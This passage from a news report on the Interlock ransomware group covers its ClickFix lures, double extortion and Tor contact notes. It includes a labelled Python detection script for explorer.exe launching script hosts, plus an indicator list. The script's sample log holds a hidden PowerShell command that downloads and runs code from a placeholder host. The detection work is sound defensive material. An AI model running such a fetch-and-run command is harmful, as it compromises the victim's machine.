They have also employed ClickFix, a social engineering method that tricks victims into running a malicious payload under the pretense of resolving a system issue. Once inside, the actors deploy various methods for discovery, credential access, and lateral movement to spread to other systems on the network.
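Because a ClickFix lure ends with the victim launching the payload from a trusted Windows UI element such as the Explorer address bar, one detection angle for defenders is to watch for explorer.exe spawning a scripting host. The following is an added example of that heuristic, not code from the advisory or the article: it assumes Sysmon-style process-creation records flattened to one JSON object per line, the list of script hosts and command-line indicators is an assumed starting point rather than anything the page attributes to Interlock, and the three log lines are constructed for illustration.

```python
"""Flag process-creation events where explorer.exe launches a scripting host.

Assumed heuristic for ClickFix-style lures (explorer.exe hosts both the
Explorer address bar and the Run dialog, so a command pasted into either
appears with explorer.exe as the parent). Field names follow a Sysmon-like
Event ID 1 layout; this is an assumption, not the advisory's own schema.
"""
import json

# Interpreters/LOLBins a user rarely types into the address bar by hand (assumed list).
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "certutil.exe", "curl.exe",
}

# Command-line fragments that raise the score (assumed indicators, not from the page).
SUSPICIOUS_ARGS = (
    "-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
    "http://", "https://", "iex", "invoke-expression",
)

# Constructed sample events: a benign Explorer launch, a benign terminal
# session, and one address-bar-style PowerShell launch.
SAMPLE_EVENTS = r"""
{"ts":"2025-07-22T13:01:05Z","host":"WS-042","user":"CORP\\jdoe","image":"C:\\Windows\\notepad.exe","parent_image":"C:\\Windows\\explorer.exe","cmdline":"notepad.exe notes.txt"}
{"ts":"2025-07-22T13:02:11Z","host":"WS-042","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\cmd.exe","parent_image":"C:\\Program Files\\WindowsApps\\WindowsTerminal.exe","cmdline":"cmd.exe"}
{"ts":"2025-07-22T13:04:37Z","host":"WS-042","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\explorer.exe","cmdline":"powershell.exe -w hidden -c \"iex (irm https://example.invalid/fix)\""}
"""


def parse_events(text: str) -> list[dict]:
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> int:
    """0 if the event does not match the parent/child pattern; otherwise
    1 plus one point per suspicious command-line fragment."""
    parent = basename(ev.get("parent_image", ""))
    child = basename(ev.get("image", ""))
    if parent != "explorer.exe" or child not in SCRIPT_HOSTS:
        return 0
    cmd = ev.get("cmdline", "").lower()
    return 1 + sum(1 for frag in SUSPICIOUS_ARGS if frag in cmd)


def find_clickfix_candidates(text: str, threshold: int = 1) -> list[dict]:
    """Return matching events annotated with their score, for triage."""
    hits = []
    for ev in parse_events(text):
        s = score_event(ev)
        if s >= threshold:
            hits.append({**ev, "score": s})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"[score {hit['score']}] {hit['ts']} {hit['host']} {hit['user']}: {hit['cmdline']}")
```

Explorer.exe is also the parent of anything started by double-clicking a shortcut, so a bare parent/child match will fire on some legitimate admin activity; the score threshold and a per-host baseline of which script hosts explorer.exe normally launches are the knobs to tune before alerting on the base rule alone.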
Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, increasing pressure on victims to pay the ransom both to get their data decrypted and to prevent it from being leaked, the advisory stated. Moreover, the ransom notes do not include a ransom demand or payment instructions. Instead, victims are provided with a unique code and are instructed to contact the ransomware group via a .onion URL through the Tor browser, noted the advisory.
“What makes Interlock uniquely dangerous is not the technical novelty of its encryption payload, but its orchestration of psychological and procedural blind spots across the enterprise. This group has weaponised familiarity by using trusted UI elements like the Windows Explorer address bar to execute remote access trojans with minimal user suspicion,” said Sanchit Vir Gogia, chief analyst and CEO at Greyhound Research. “They exploit patch cycles, user habits, and the assumed sanctity of digital hygiene. By embedding across multiple vectors, such as social, technical, and procedural, Interlock increases recovery cost not just in infrastructure, but in trust and governance posture. Its pivot from fake CAPTCHA prompts to deceptive ‘fix’ messages reflects an agile, feedback-driven threat actor able to learn and adapt faster than most enterprise defence protocols can cycle.”